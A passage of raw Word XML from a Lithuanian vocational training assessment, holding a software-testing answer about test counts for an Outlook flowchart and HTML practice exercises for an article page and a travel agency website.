              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="278" w:name="_Toc14392499"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Atsakymas:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="278"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="279" w:name="_Toc14392500"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Tam, kad padengtume visa funkcionalumą, mums reiktų atsižvelgti į schemoje esančių briaunų skaičių. Šiuo atveju jos yra dvi, tad pakanka 2 test</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>ų:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="279"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="280" w:name="_Toc14392501"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t xml:space="preserve">1 – jei outlook </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>įsijungė, siunčiame laišką ir uždarome programą;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="280"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="281" w:name="_Toc14392502"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t xml:space="preserve">2 – </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>kai startuojame outlook, tačiau jis nepasileidžia.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="281"/>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9D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Žemiau pateiktą kodą pavaizduokite schematiškai (kaip pvz  14  klausime). Kiek test</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:val="lt-LT" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>ų reikia atlikti, norint jį ištestuoti?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002625CC" w:rsidRPr="00AD4464" w:rsidRDefault="002625CC" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>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777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4077" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="282" w:name="_Toc14392503"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E69F4BD" wp14:editId="11DEBD19">
                  <wp:extent cx="2266315" cy="1709420"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20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66315" cy="1709420"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:bookmarkEnd w:id="282"/>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5777" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="283" w:name="_Toc14392504"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Atsakymas: Reikia 2 tes</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>tų.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="283"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="284" w:name="_Toc14392505"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="290911AB" wp14:editId="5BF79FB1">
                  <wp:extent cx="1033780" cy="2080895"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="21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033780" cy="2080895"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:bookmarkEnd w:id="284"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002E36AD" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0"/>
        <w:ind w:left="432" w:right="282" w:hanging="432"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="285" w:name="_Toc123180786"/>
      <w:bookmarkStart w:id="286" w:name="_Toc10443998"/>
      <w:bookmarkStart w:id="287" w:name="_Toc13095546"/>
      <w:bookmarkStart w:id="288" w:name="_Toc13833440"/>
      <w:bookmarkStart w:id="289" w:name="_Toc14392506"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Modulis „N</w:t>
      </w:r>
      <w:r w:rsidRPr="002E36AD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>esudėti</w:t>
      </w:r>
      <w:r w:rsidR="0084795E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ngos programinės įrangos kūrimas</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="002E36AD">
        <w:rPr>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:bookmarkEnd w:id="285"/>
      <w:bookmarkEnd w:id="286"/>
      <w:bookmarkEnd w:id="287"/>
      <w:bookmarkEnd w:id="288"/>
      <w:bookmarkEnd w:id="289"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:spacing w:after="0"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="290" w:name="_Toc13833441"/>
      <w:bookmarkStart w:id="291" w:name="_Toc14392507"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Kompetencija. Projektuoti ir programuoti žiniatinklio puslapių vartotojo sąsajas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="290"/>
      <w:bookmarkEnd w:id="291"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="292" w:name="_Toc13833442"/>
      <w:bookmarkStart w:id="293" w:name="_Toc14392508"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Pateikti internetinio puslapio turinį naudojant kompiuterinę žymėjimo kalbą.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="292"/>
      <w:bookmarkEnd w:id="293"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pP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1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002E36AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PATEIKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> TURINĮ HTML ŽYMĖJIMO KALBA (STRAIPSNIS)</w:t>
      </w:r>
      <w:r w:rsidR="002E36AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A"/>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Rezultatai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00493637" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidR="00E75D7A">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="005757E6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>index.html</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 lang="en"&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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;meta charset="UTF-8"&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itle&gt;HTML praktinė užduotis Nr. 1&lt;/tit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boldas, pusjuodis, pastorintasis šriftas&lt;/h3&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2&gt;Ar vartotinas žodis „boldas“?&lt;/h2&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lt;i&gt;Boldas&lt;/i&gt; – nevartotina svetimybė. &lt;/p&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V. Dagienės, G. Grigo, T. Jevsikovos &lt;a href="#"&gt;„Enciklopediniame kompiuterijos žodyne“&lt;/a&gt; (Vilnius, 2008, p. 389) teikiamas terminas &lt;b&gt;pusjuodis&lt;/b&gt;, angl. &lt;i&gt;bold&lt;/i&gt;. Tai šrifto stilius, kai rašmenys, norint juos paryškinti, piešiami pastorintomis linijomis.&lt;/p&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Kaip nevartotina svetimybė &lt;i&gt;boldas&lt;/i&gt; vertinamas „Kalbos patarimuose“, siūlomi pakaitai: 1. &lt;b&gt;pusjuodis&lt;/b&gt;; 2. &lt;b&gt;pastorintasis&lt;/b&gt; (šriftas) (žr.: Kalbos patarimai. Kn. 4: Leksika: 1. Skolinių vartojimas, Vilnius, 2013, p. 19; pataisytas ir papildytas leidimas, Vilnius, 2005, p. 33).&lt;/p&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Žymės: &lt;a href="#"&gt;kompiuterija&lt;/a&gt;, &lt;a href=""&gt;leksika&lt;/a&gt;, &lt;a href=""&gt;neteiktina svetimybė&lt;/a&gt;&lt;/p&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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pP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bCs w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD01E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PATEIK</w:t>
      </w:r>
      <w:r w:rsidR="00BD01E9" w:rsidRPr="00BD01E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD01E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> TURINĮ HTML ŽYMĖJIMO KALBA (KELIONIŲ AGENTŪRA)</w:t>
      </w:r>
      <w:r w:rsidR="00BD01E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A"/>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Rezultatai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005E579E" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="357" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00BD01E9">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>Index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="357" w:right="284"/>
        <w:jc w:val="both"/>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lt;html&gt;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itle&gt;www praktinis darbas&lt;/tit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charset="UTF-8"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author" content="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keywords" content="HTML,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description" content="TOP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2&gt;Kelionės&lt;/h2&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gt;Paskutinė minutė&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page/poilsines.html"&gt;Poilsinės kelionė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page/datos.html"&gt;Kelionių dato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Paskutinė minutė&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4&gt;Ispanija, Kosta Dorada&lt;/h4&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img src="img/barcelona.jpg" alt="paveiksliukas" width="300"&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Paskutinės minutės atostogos Ispanijoje, Salou! Skrydis iš Vilniaus, &lt;br /&gt; bagažas, pervežimai ir 7 n. viešbutyje su pusryčiais ir vakarienėmis - 379 &amp;euro;!&lt;/p&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Išvykimo laikai&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Vilnius - Barselona 14:00 - 16:30&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Barselona - Vilnius 17:30 - 22:00&lt;/li&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Į kelionės kainą įskaičiuota:&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Skrydis Vilnius - Barselona - Vilniu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Pervežimas oro uostas - viešbutis - oro uosta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20 kg registruojamas ir rankinis bagaža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7 n. apgyvendinimas pasirinktame viešbutyje su nurodytu &lt;br /&gt; maitinimo tipu.&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ol&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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C64E6D" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00B92973">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00995FE6">
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>Aplankas „Pages“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00934109" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="357" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="00404FFD">
        <w:t>2.1.</w:t>
      </w:r>
      <w:r w:rsidR="00AD22F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>Datos.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="357" w:right="284"/>
        <w:jc w:val="both"/>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lt;html&gt;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itle&gt;www praktinis darbas&lt;/tit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charset="UTF-8"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author" content="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keywords" content="HTML,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description" content="TOP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sty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table,</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td,</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th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border: 1px solid grey;</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border-collapse: collapse;</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sty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2&gt;Kelionės&lt;/h2&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index.html"&gt;Paskutinė minutė&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poilsines.html"&gt;Poilsinės kelionė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datos.html"&gt;Kelionių dato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Kelionių datos&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ab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h&gt;Data&lt;/th&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h&gt;Kryptis&lt;/th&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h&gt;Kaina&lt;/th&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Rugsėjo 18 - Rugsėjo 28&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Turkija&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345 &amp;euro;&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Rugsėjo 20 - Rugsėjo 25&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Kipras&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d&gt;299 &amp;euro;&lt;/t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r&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ab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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0067273C" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="360" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="003724C8">
        <w:t>2.2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F26A6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0018763E" w:rsidRPr="00AD4464">
        <w:t>Plač</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
